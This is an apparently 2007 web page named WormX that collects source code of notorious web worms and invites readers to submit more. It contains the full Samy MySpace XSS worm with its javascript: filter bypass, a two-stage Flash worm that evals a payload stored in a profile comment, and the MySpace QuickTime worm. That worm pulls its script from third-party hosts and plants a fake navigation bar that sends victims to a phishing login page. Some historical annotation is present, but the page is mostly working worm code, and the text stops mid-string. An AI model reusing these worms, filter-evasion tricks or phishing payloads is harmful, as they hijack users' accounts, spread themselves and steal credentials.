WormX

Mon, 22 Jan 2007 23:01:33 GMT

WormX is a collection of various notorious web worms, mostly written on top of popular client-side technologies (JavaScript/XMLHttpRequest, Flash, QuickTime) and propagating primarily on social networking web sites.

For those of you who do not know what ajax worms are, here is a bit of Internet history:

In October 2005, a flaw in the MySpace's site design was exploited by a user only known as "Samy" to create the world's first self-propagating cross-site scripting worm. MSNBC has also reported that MySpace is a "hotbed" for spyware, and that infection rates are rising because of MySpace. In addition to this, the customization of user pages currently allows the injection of certain HTML which can be crafted to form a phishing user profile. Wikipedia

If you want to submit a worm, we are going to need the following information:

  1. Worm name - It must be enclosed inside <h3>[atom name here]</h3> tags.
  2. Worm description - It must start on a new paragraph.
  3. Worm code - It must be enclosed inside <pre><code>[atom code here]</code></pre> tags. If the worm is composed of more than one segment, each segment must be introduced by <em>[segment name or id]</em> on a new paragraph.
  4. Worm tags - It must be a comma-separated string.

Thanks for the contributions!


Samy

The first AJAX worm ever was Samy, and it hit MySpace in October 2005. Here is the source code of the infamous worm. The worm propagates by exploiting MySpace's failure to sanitize JavaScript URLs in styles, as shown below: the scheme is split as "java" + line break + "script:" to get past the filter, and the payload itself is kept in the element's custom `expr` attribute and started through `eval(document.all.mycode.expr)`. The purpose of the worm is to copy itself into the Heroes section of whoever views an infected profile (it scrapes MySpace's own Mytoken and hash values out of the responses to submit the edit) and to add Samy to their friends list.

<!-- Samy (MySpace, October 2005), kept verbatim including its line breaks.
     A DIV whose CSS background is a javascript: URL; the scheme is written as "java"
     + line break + "script:" so MySpace's URL filter did not recognise it, while the
     browser of the day still executed it (the code is IE-oriented: document.all,
     createTextRange, ActiveX XHR). The worm body lives in the custom "expr" attribute
     and is started by eval(document.all.mycode.expr).
     What expr does: g() reads the page source; getClientFID() pulls the viewer's
     friendID out of the "up_launchIC( '" call on the page (the Userplane IM library);
     the worm cuts its own "mycode ... DIV" text out of the source (AA..AE), re-quotes
     the javascript: URL, and - only if the viewer's Heroes section does not already
     contain "samy" - appends "but most of all, samy is my hero." plus the DIV to it
     (getHome -> profile.previewInterests -> postHero -> profile.processInterests,
     reusing the Mytoken and hash values scraped from MySpace's own responses).
     main() also submits an add-friend request for friendID 11851658 (processxForm).
     Split identifiers such as 'm'+'ycode', 'inne'+'rHTML' and 'onr'+'eadystatechange'
     are presumably there to dodge a keyword blacklist. -->
<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var 
AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

MySpace, profile


Random MySpace Phish Worm

This is something picked up from packetstorm and filed as a MySpace phish worm. Note that the listing below appears to be the Userplane presence/IM client as embedded on MySpace (the `up_*` globals and the userplane.com / myspace.com/userplane endpoints) rather than a worm payload on its own; the Samy code above scrapes the viewer's friendID out of this library's `up_launchIC(` call. The point of interest for phishing is `up_show()`, which builds an "Incoming IM Message" prompt via innerHTML and splices the user ID delivered by `receiveData()` unescaped into its onClick handlers.

// Userplane presence endpoints: the bare presence server name handed to the Flash
// movie, the static asset host, the presence feed host, and the MySpace IM launcher page.
var up_pServ = "presence.userplane.com";
var up_sURL = "http://cache.static.userplane.com/presence";
var up_dURL = "http://feed.presence.userplane.com/presence";
var up_wmURL = "http://www.myspace.com/userplane/ic.cfm";
function up_launch(_1){
// Open (or reuse) the IM popup for destination user _1. up_ow caches one window per
// user; a cached entry whose opener is gone is treated as closed and reopened.
up_ow[_1]=up_ow[_1]==undefined?null:up_ow[_1];
if(up_ow[_1]==null||up_ow[_1].opener==undefined){
// _1 goes into the query string and the window name without any encoding. It reaches
// this function from receiveData(), i.e. from the presence feed, not from page state.
up_ow[_1]=window.open(up_wmURL+"?sendType=3&strEncryptedID="+up_sid+"&strDestinationUserID="+_1,"ICWindow_"+_1,"width=500,height=475,toolbar=0,directories=0,menubar=0,status=0,location=0,scrollbars=0,resizable=1");
if(up_ow[_1]==null){
// window.open returned null (popup blocked): fall back to the in-page prompt.
up_notify(_1);
}else{
// Popup opened: drop any pending prompt for this user. The second argument is false,
// so up_clear also notifies the feed even when nothing was pending.
up_clear(_1,false);
}
}
}
function up_clear(_2,_3){
  // Drop every pending IM prompt for user _2. Unless the caller passed _3 (forceClear)
  // as true while nothing was pending, also tell the presence feed to clear the user by
  // loading o.php into the hidden up_lf iframe. The on-page prompt is refreshed last.
  var pending = up_la;
  up_la = [];
  var dropped = false;
  var entry;
  // Drain the old list from the back; survivors are re-added in pop order, so the
  // surviving entries end up reversed relative to their previous order.
  while ((entry = pending.pop()) !== undefined) {
    if (entry.uid == _2) {
      dropped = true;
    } else {
      up_la.push(entry);
    }
  }
  if (dropped || !_3) {
    frames["up_lf"].location.href = up_dURL + "/o.php?sid=" + up_sid + "&ou=" + _2 + "&forceClear=" + (_3 ? "true" : "false");
  }
  up_show();
}
function up_notify(_7){
  // Queue an "incoming IM" prompt for user _7 unless one is already pending, then
  // refresh the on-page prompt. The display name is always the fixed placeholder.
  var alreadyQueued = false;
  for (var i = 0; i < up_la.length && !alreadyQueued; i++) {
    alreadyQueued = up_la[i].uid == _7;
  }
  if (!alreadyQueued) {
    up_la.push({ uid: _7, n: "A website member" });
  }
  up_show();
}
function up_show(){
// Render the oldest pending IM prompt into the #up_nd panel and slide it in; with
// nothing pending, slide the panel back out of view.
var e=document.getElementById("up_nd");
if(up_la.length>0){
// Only rebuild the markup when the displayed user changes.
if(up_uid_display!=up_la[0].uid){
// The prompt is assembled by string concatenation and assigned to innerHTML.
// up_la[0].n is the fixed text set by up_notify(), but up_la[0].uid is spliced raw
// into two onClick attributes, and that value originates from the presence feed
// (receiveData), not from the page - nothing here escapes it.
e.innerHTML="<div style=\"text-align:center\">"+(up_is_win_ie?"":"<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td align=\"center\">")+"<table border=\"0\" cellpadding=\"2\" cellspacing=\"5\"><tr><td nowrap align=\"center\"><strong style=\"font-size:larger;\">Incoming IM Message</strong></td></tr><tr><td align=\"center\">"+up_la[0].n+" wants to IM you.<br>Would you like to accept?</td></tr><tr><td nowrap align=\"center\"><a style=\"font-size:larger;\" href=\"\" onClick=\"javascript: up_launch( '"+up_la[0].uid+"' ); return false;\">Yes</a>           <a style=\"font-size:larger;\" href=\"\" onClick=\"javascript: up_clear( '"+up_la[0].uid+"', true ); return false;\">No</a></td></tr></table>"+(up_is_win_ie?"":"</td></tr></table>")+"</div>";
up_uid_display=up_la[0].uid;
up_animate(200);
}
}else{
up_uid_display="";
up_animate(-200);
}
}
function up_animate(dY){
// Slide #up_nd toward vertical offset dY in 10px steps every 33ms. While a prompt is
// pending the timer keeps re-arming so the panel follows document.body.scrollTop.
var e=document.getElementById("up_nd");
if(up_divY!=dY||up_la.length>0){
if(up_divY!=dY){
up_divY+=dY<up_divY?-10:10;
}
var px=up_divY+document.body.scrollTop+"px";
e.style.top=px;
clearTimeout(up_at);
// String-form setTimeout (evaluated code). dY is always a number here, so it is
// harmless in practice, but a function reference would avoid the eval entirely.
up_at=setTimeout("up_animate("+dY+")",33);
}else{
// Final position is assigned as a bare number, without the "px" suffix used above.
e.style.top=dY;
}
}
function up_clean(_f){
  // Reduce a string to [A-Za-z0-9]; every other UTF-16 unit becomes "_".
  var cleaned = "";
  for (var i = 0; i < _f.length; i++) {
    var ch = _f.charAt(i);
    cleaned += /[A-Za-z0-9]/.test(ch) ? ch : "_";
  }
  return cleaned;
}
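function receiveData(_13){
  // Presence-feed callback: `_13` is a comma-separated list of user IDs that want to
  // IM the viewer; each one opens (or re-prompts for) an IM window via up_launch().
  // Non-string or empty input is ignored instead of throwing on .split().
  if (typeof _13 !== "string" || _13 === "") {
    return;
  }
  var ids = _13.split(",");
  // Declared locally - the original assigned the implicit global `u`, which is a
  // ReferenceError in strict mode. As before, the loop stops at the first empty
  // field, so "a,,b" launches only "a".
  var id;
  while ((id = ids.shift())) {
    up_launch(id);
  }
}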
function URLencode(_15){
  // escape() leaves "+" and "/" (among others) untouched; percent-encode those, plus
  // the two quote characters, so the value is safe inside a query string.
  var encoded = escape(_15);
  var extra = { "+": "%2B", "\"": "%22", "'": "%27", "/": "%2F" };
  return encoded.replace(/[+"'\/]/g, function (ch) { return extra[ch]; });
}
function up_runPresence(sid,uid){
// Entry point. Initialises the module globals, then document.write()s three things:
// a hidden iframe (up_lf, used by up_clear to hit the feed's o.php), the notification
// panel (up_nd) and, when a session id is present, a 1x1 Flash presence movie.
// The `uid` parameter is accepted but never used.
up_sid=URLencode(sid);
up_divY=-200;
up_la=new Array();
up_ow=new Object();
up_uid_display="";
document.write("<iframe name=\"up_lf\" id=\"up_lf\" style=\"position:absolute; top: -200px; z-index:9998; width:100px; height:100px; border: 0px\" src=\"\"></iframe>");
document.write("<div id=\"up_nd\" style=\"position:absolute; width:250px; z-index:111111; left: 30px; top: -200px; background-color:#eeeeee; border: 1px solid #000000;\"></div>");
if(up_sid!=""){
var _18="server="+up_pServ+"&uid="+up_sid;
// allowScriptAccess="anyDomain": presence.swf, served from cache.static.userplane.com,
// is allowed to call JavaScript in the embedding page regardless of origin. That is
// presumably how the feed reaches receiveData(); nothing on this page shows the SWF side.
document.write("<div id=\"flash\" style=\"position:absolute; width:100px; z-index:9996; top: -200px;\"><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0\" id=\"presence\" width=\"1\" height=\"1\" align=\"middle\"><param name=\"allowScriptAccess\" value=\"anyDomain\" /><param name=\"movie\" value=\""+up_sURL+"/presence.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"flashvars\" value=\""+_18+"\" /><embed src=\""+up_sURL+"/presence.swf\" flashvars=\""+_18+"\" quality=\"high\" bgcolor=\"#ffffff\" width=\"1\" height=\"1\" swLiveConnect=true id=\"presence\" name=\"presence\" align=\"middle\" allowScriptAccess=\"anyDomain\" type=\"application/x-shockwave-flash\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\" /></object></div>");
}
}
// Module state, all (re)initialised by up_runPresence(): encoded session id, current
// panel offset, pending prompts, uid currently displayed, animation timer handle, and
// the per-user map of open IM windows.
var up_sid=null;
var up_divY=null;
var up_la=null;
var up_uid_display=null;
var up_at=null;
var up_ow=null;
// Browser sniffing from the user-agent / appVersion strings. Only up_is_win_ie is
// consumed on this page (up_show uses it to pick the table wrapper).
var up_agt=navigator.userAgent.toLowerCase();
var up_appVer=navigator.appVersion.toLowerCase();
var up_is_mac=up_agt.indexOf("mac")!=-1;
var up_is_safari=up_agt.indexOf("safari")!=-1&&up_is_mac;
var up_is_khtml=up_is_safari||up_agt.indexOf("konqueror")!=-1;
var up_is_ie=up_appVer.indexOf("msie")!=-1&&up_agt.indexOf("opera")==-1&&!up_is_khtml;
var up_is_win=up_is_mac?false:(up_agt.indexOf("win")!=-1||up_agt.indexOf("16bit")!=-1);
var up_is_win_ie=up_is_win&&up_is_ie;

MySpace, phishing


The infamous MySpace Flash Worm

The worm works by embedding Flash content that opens a URL once the movie plays. This is achieved via the getURL method. The first getURL redirects the user to a blog page where another Flash component opens a javascript: URL that is evaluated inside the MySpace context; as in Samy, the scheme is broken with control characters ("javas\n\rcript:") to get past URL filtering, and the real payload is fetched at run time from a profile comments page and eval()ed. More information about this worm can be found here.

stage 1: open a remote URL

// Stage 1: the SWF embedded in the profile simply navigates the browser to a remote
// page (the real address is elided as "url" in this listing); that page hosts the
// stage-2 movie.
getURL("url");

stage 2: evaluate a JavaScript URL

// Stage 2: the second SWF opens a javascript: URL, so the script runs in the origin of
// the page that embeds the movie. "javas\n\rcript:" splits the scheme with LF/CR - the
// same filter-evasion trick as Samy. The script fetches the HomeComments page of
// friendID 93634373 over MSXML XHR, cuts out the text between the markers "BX-" and
// "-EX", removes each "<br>" / "-XXX" marker (plus one following character) that
// MySpace's formatting inserted, and eval()s what is left - i.e. the real payload is
// stored in a profile comment and loaded at run time, not carried in the movie.
getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'
http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);
x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\'<br>\')!=-1)||(sc.indexOf(\'-XXX\')!=-1)){var n=sc.indexOf(\'<br>\');if(n==-1)n=sc.indexOf(\'-XXX\');sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};" + "eval(sc);}};" + "x.send(null);", "");

MySpace, flash, getURL


MySpace QuickTime Worm

Billy Hoffman from SPI has an analysis of the MySpace QuickTime worm here. The worm makes use of a QuickTime XSS flaw (HREF tracks that run JavaScript in the embedding page) discussed here.

/*
 * Source code received from BurntPickle (http://www.myspace.com/burntpickle)
 * 
 * Comments and formating by SPI Dynamics (http://www.spidynamics.com)
 * This code may be republished as long as the above text is kept
 */

/*

This JavaScript was inside of a Quicktime movie. It uses a
feature known as HREF tracks (http://www.apple.com/quicktime/tutorials/hreftracks.html)
which allows Quicktime to load new movie files, webpages or
run JavaScript. The worm's author created an empty Quicktime
movie that contains an HREF grack that would automatically
execute this JavaScript.

This code served as a bootstrap to load the full malware
code from a 3rd party webserver. This is most likely due to
length limitations for URLs in HREF tracks. 

*/

// Bootstrap carried in the QuickTime HREF track: a javascript: URL that injects a
// <script> tag pointing at one of two third-party hosts, which then serves the full
// worm (js.js, listed below).
javascript:

// NOTE(review): as listed, the expression is never closed or invoked - "void((" has no
// matching "))" and the function expression is never called. The original presumably
// ended with "})())"; the listing looks truncated.
void((
function() {
    //create a new SCRIPT tag
    var e=window.document.createElement('script');
    var ll=new Array();
    ll[0]='http://www.daviddraftsystem.com/images/';
    ll[1]='http://www.tm-group.co.uk/images/';
    
    //Randomly select a host that is serving the full code
    //of the malware
    //("% 1" is a no-op on Math.random(), which is already in [0,1); this just picks 0 or 1)
    var lll=ll[Math.floor(2*(Math.random()%1))];
    //set the SRC attribute to the remote site
    e.setAttribute('src',lll+'js.js');
    //append the SCRIPT tag to the current document. The
    //current document would be whatever webpage contains
    //the embedded movie, in this case, a MySpace profile page
    //This causes the full code of the malware to execute.
    window.document.body.appendChild(e);
})
The code downloaded from the randomly selected server (js.js), with SPI's comments:
/*
 * Source code received from BurntPickle (http://www.myspace.com/burntpickle)
 * 
 * Comments and formating by SPI Dynamics (http://www.spidynamics.com)
 * This code may be republished as long as the above text is kept
 */

//========================================================
//======================================================== Functions
//========================================================

//It is odd that the author uses both literal JavaScript functions and
//anonymous functions

/*
 doEdit - Edits someone's profile to infect them with the Quicktime file
          and the HTML to overwrite the top menu with a phishing menu
params:
    oXML - An XHConn object that has received a response
returns: void
          
*/
/*
 Review notes: this runs in the victim's own session, so the POST below carries the
 victim's real __VIEWSTATE and editInterests hash scraped from the GET response - the
 site's anti-forgery values offer no protection against in-origin script. The numeric
 offsets passed to findContents() are the distance from each marker to the start of
 the value in MySpace's markup of the day; any change to that markup silently breaks
 the extraction.
*/
var doEdit=function(oXML){
    //extract the friend id from the current page
	var friendid=encodeURIComponent(findContents(oXML,'friendid=','&MyToken=',9));

	if(friendid){
	    //extract the old values for the various profile fields
		var theviewstate = encodeURIComponent(findContents(oXML,'__VIEWSTATE','\" />', 37));
		var thehash = encodeURIComponent(findContents(oXML,'editInterests_hash','\" />', 27));
		var headlinetext = encodeURIComponent(findContents(oXML,'editInterests$HeadlineText','\" maxlength', 47));
		var aboutmetext = encodeURIComponent(findContents(oXML,'editInterests$AboutMeText','</textarea>', 127));
		var liketomeettext = encodeURIComponent(findContents(oXML,'editInterests$LikeToMeetText','</textarea>', 133));
		var generaltext = encodeURIComponent(findContents(oXML,'editInterests$GeneralText','</textarea>', 126));
		var musictext = encodeURIComponent(findContents(oXML,'editInterests$MusicText','</textarea>', 122));
		var moviestext = encodeURIComponent(findContents(oXML,'editInterests$MoviesText','</textarea>', 124));
		var televisiontext = encodeURIComponent(findContents(oXML,'editInterests$TelevisionText','</textarea>', 132));
		var bookstext = encodeURIComponent(findContents(oXML,'editInterests$BooksText','</textarea>', 122));
		var heroestext = encodeURIComponent(findContents(oXML,'editInterests$HeroesText','</textarea>', 124));
		//An empty headline leaves the encoded tail of the markup ('" maxleng') in
		//headlinetext; reset it so the POST does not write that garbage into the field.
		if('%22%20maxleng' == headlinetext) {
			headlinetext  = '';
		}

        //Checking if this profile already has a reference to the quicktime movie, and thus if has this profile
        //already been infected. This is used later
		var c = moviestext.indexOf("piAF2iuswo.mov");
        
		var urlpost = 'http://' + document.location.host + '/Modules/ProfileEdit/Pages/Interests.aspx?fuseaction=profile.interests';

        //Update the profile with our infected content
        //Note that all the controls start with the same prefix. The author could have
        //stored this prefix in a string to make the virus smaller.
		var postinfo = "__VIEWSTATE=" + theviewstate
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24hash=" + thehash
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24SaveTop=Save+All+Changes"
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24HeadlineText=" + headlinetext
		//Here the HTML for the top menu with Phishing links is inserted into the profile
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24AboutMeText=" + aboutmetext + cc[0]
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24LikeToMeetText=" + liketomeettext
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24GeneralText=" + generaltext
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24MusicText=" + musictext
		//Here a reference to the quicktime movie is inserted
		//(cc[0] and cc[3] are appended raw, not through encodeURIComponent, unlike the scraped values)
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24MoviesText=" + moviestext + cc[3]
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24TelevisionText=" + televisiontext
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24BooksText=" + bookstext
		+ "&ctl00%24ctl00%24Main%24ProfileEditContent%24editInterests%24HeroesText=" + heroestext;

        //The author is checking if this profile has already been infected. Really, this check should have been
        //perform at the start of function. This would have made the virus faster by not having to perform
        //needless string operations.
		if(-1 == c) {
		    //if profile has not been infected, update the profile with infected content.
			editProf.connect(urlpost,"POST",postinfo,friendsWrapper);
		}
	}
};

/*
 doMessage - Tries to send a message to another MySpace user
             with a link to a pornographic website
params: none
returns: void
          
*/
/*
 Review notes: runs 6 seconds after the qtkt0..3 iframes were created (see the setTimeout
 at the bottom of the file) and fills in the compose form of each one. Reaching into
 frame.document only works while the iframes (profile.myspace.com) share an origin with
 the infected page; on any other host the first access would throw. The send click is
 commented out, so as listed nothing is actually sent.
*/
function domessage() {
    //for all the iframes that were created to send a message
    for(var y=0;y<ap.length;y++) {
	    if(-1!=window.frames['qtkt'+y].document.body.innerHTML.indexOf('ctl00$ctl00$Main$Main$sendMessageControl$subjectTextBox')) {
	        //populate the subject with a random message ("% 1" is a no-op on Math.random())
		    window.frames['qtkt'+y].document.forms[1].ctl00$ctl00$Main$Main$sendMessageControl$subjectTextBox.value=su[Math.floor(6*(Math.random()%1))];
			//insert a pornographic picture which links to a pornographic website
			window.frames['qtkt'+y].document.forms[1].ctl00$ctl00$Main$Main$sendMessageControl$bodyTextBox.value=cc[2];

			//The below line of code would send the message to a MySpace user.
			//in the copy of the code I received, this line was commented out
			//because of this, it appear the worm didn't actually send the messages

			//window.frames['qtkt'+y].document.forms[1].btnSend.click();
        }
    }
}

/*
findContents - Extracts a substring that occurs between two other strings
params:
    oXML - An XHConn object which has returned a response
    start - first string to look for
    end - string to find that occurs after the start string
    offset - offset between the two string to begin extracting at

returns: Extracted contents or an empty string
          
*/
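/*
findContents - Extracts a substring that occurs between two other strings
params:
    oXML - An XHConn object (anything with a responseText string) which has returned a response
    start - first string to look for
    end - string to find that occurs after the start string
    offset - number of characters after the position of `start` at which extraction begins
             (the callers pass the distance from the marker to the field value)

returns: Extracted contents with the four basic HTML entities decoded, or an empty
         string when either marker is missing. Decoding &amp; last means a literal
         "&amp;lt;" in the page comes back as "&lt;" rather than "<".

Note: the copy of this listing shown on the page had the entity names rendered away
(e.g. replace(/</g,"<")), turning every replacement into a no-op; the &lt;/&gt;/&quot;/&amp;
names are restored here. The original also fell through substring(s+offset, -1) when
`end` was absent, returning an unrelated prefix of the page; that case now returns ''.
*/
var findContents=function(oXML,start,end,offset){
	var text = oXML.responseText;
	var s = text.indexOf(start);
	//only keep looking if we found the start string
	if(-1 == s) {
		return '';
	}
	var e = text.indexOf(end, s);
	//missing end marker, or one that sits before the value would start: nothing usable
	if(-1 == e || e < s + offset) {
		return '';
	}
	var n = text.substring(s + offset, e);
	//this undoes an HTML entity conversion, because the text was reflected inside a Textbox and
	//had entities applied to it when returned from MySpace
	return n.replace(/&lt;/g,"<").replace(/&gt;/g,">").replace(/&quot;/g,"\"").replace(/&amp;/g,"&");
};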

/*
friendsWrapper - Unknown. The source code I received simply had an empty function
                 with a comment. This might just exist because a callback function
                 is needed for the XmlHttpRequest that is made to update the profile
          
*/
/*
friendsWrapper - Completion callback handed to editProf.connect() for the profile-save
                 POST in doEdit(). Intentionally does nothing in the copy SPI received
                 (the original body was just the comment "removed for now"); the
                 argument is the finished XHR and is ignored.
*/
var friendsWrapper = function (oXML) {
	return;
};

/*
XHConn - Creates a new XHConn object, which extends the XmlHttpRequest object. It
         handles creating an XHR in a cross platform manner, and creates a wrapper
         that handles onreadystatechange.

returns: XHConn object
          
*/
/*
XHConn - Creates a new XHConn object, which extends the XmlHttpRequest object. It
         handles creating an XHR in a cross platform manner, and creates a wrapper
         that handles onreadystatechange.

returns: XHConn object

Review note: the `return null` below does not do what it says when the function is
invoked with `new` (as it is at the bottom of the file) - a constructor that returns a
non-object still yields `this`, so on a browser with no XHR the caller gets an object
without a connect() method and editProf.connect(...) throws.
*/
function XHConn() {
    //xmlhttp and bComplete are locals of this constructor call, captured by the
    //connect() closure below - effectively private per-instance state, not globals.
	var xmlhttp, bComplete = false;

    //Create XHR, regardless of browser (ActiveX first, native XMLHttpRequest last)
	try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
	catch(e) {
		try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
		catch(e) {
			try { xmlhttp = new XMLHttpRequest(); }
			catch(e) { xmlhttp = false; }
		}
	}
	if(!xmlhttp) return null;
	
	/*adds a connect method
	
	  params:
	    sURL - URL to send request to
	    sMethod - HTTP method to use, if not GET, assumes POST
	    sVars - PARAMETERS
	    fnDone - function to callback once connection is completed
	  returns: true when the request was dispatched, false when no XHR exists or
	           open()/send() threw (the error is swallowed)
	*/
	this.connect = function(sURL, sMethod, sVars, fnDone) {
		if(!xmlhttp) return false;
		bComplete = false;
		sMethod = sMethod.toUpperCase();
		try {
		    //if it is a get, we send no parameters
			if(sMethod == "GET") {
				xmlhttp.open(sMethod, sURL, true)
				sVars = "";
			} else {
			    //else sent the appropriate headers for a POST
				xmlhttp.open(sMethod, sURL, true);
				//"Method" is not a real request header; this line is a no-op cargo-culted
				//from the request line and can be ignored.
				xmlhttp.setRequestHeader("Method","POST "+sURL+" HTTP/1.1");
				xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
			}
			//Wrap the onreadystatechange and make sure that that the request has completly returned
			xmlhttp.onreadystatechange = function() {
			    //normally a check for statuscode == 200 is done here, but for some reason they didn't
				if(xmlhttp.readyState == 4 && !bComplete) {
					bComplete = true;
					fnDone(xmlhttp);
				}
			};
			//send the request
			xmlhttp.send(sVars);
		} catch(z) { return false; }
		return true;
	};
	//redundant under `new`, which returns `this` anyway
	return this;
}

//========================================================
//======================================================== Global Variables
//========================================================

//the content the worm needed (Phishing pages, malicious Quicktime movie, JavaScript code, etc)
//was stored on multiple servers. The worm randomly selects one to use
//the content the worm needed (Phishing pages, malicious Quicktime movie, JavaScript code, etc)
//was stored on multiple servers. The worm randomly selects one to use
var ll=new Array();
ll[0]='http://www.daviddraftsystem.com/images/';
ll[1]='http://www.tm-group.co.uk/images/';
//"% 1" is a no-op on Math.random() (already in [0,1)); this picks index 0 or 1
var lll=ll[Math.floor(2*(Math.random()%1))];

//this is an array containing different phrases to use as the subject of a message to other MySpace
//users
var su=new Array();
su[0]='what else is there to do on a Sunday.?.......';
su[1]='You better not forget about this..';
su[2]='Hehe that was so funny..';
su[3]='better see this one last time lol..';
su[4]='omg did you see this last nite..';
su[5]='whos coming to the party tonight.?..';

//This array contains various payloads used by the worm (cc[1] is never assigned)
var cc=new Array();
//This is the HTML used to hide the old top menu bar and replace it with a menu pointing to a fake login page.
//The <style> rules display:none the real navbar cells; the absolutely positioned .testnav div then
//draws a look-alike menu whose every link goes to login.html on the attacker's host (lll).
cc[0]='<style type="text/css">\n'
+'div table td font { display: none }\n'
+'div div table tr td a.navbar, div div table tr td font { display: none }\n'
+'.testnav { position:absolute; top: 136px; left:50%; _top: 146px }\n'
+'</style><div style="z-index:5; background-color: #6698CB; margin-left:-400px; width: 800px" align="center" class="testnav"><div style="">'
+'<a href="'+lll+'login.html" target="" class="navbar">Home</a> | <a href="'+lll+'login.html" target="" class="navbar">Browse</a> | '
+'<a href="'+lll+'login.html" target="" class="navbar">Search</a> | <a href="'+lll+'login.html" target="" class="navbar">Invite</a> | '
+'<a href="'+lll+'login.html" target="" class="navbar">Film</a> | <a href="'+lll+'login.html" target="" class="navbar">Mail</a> | '
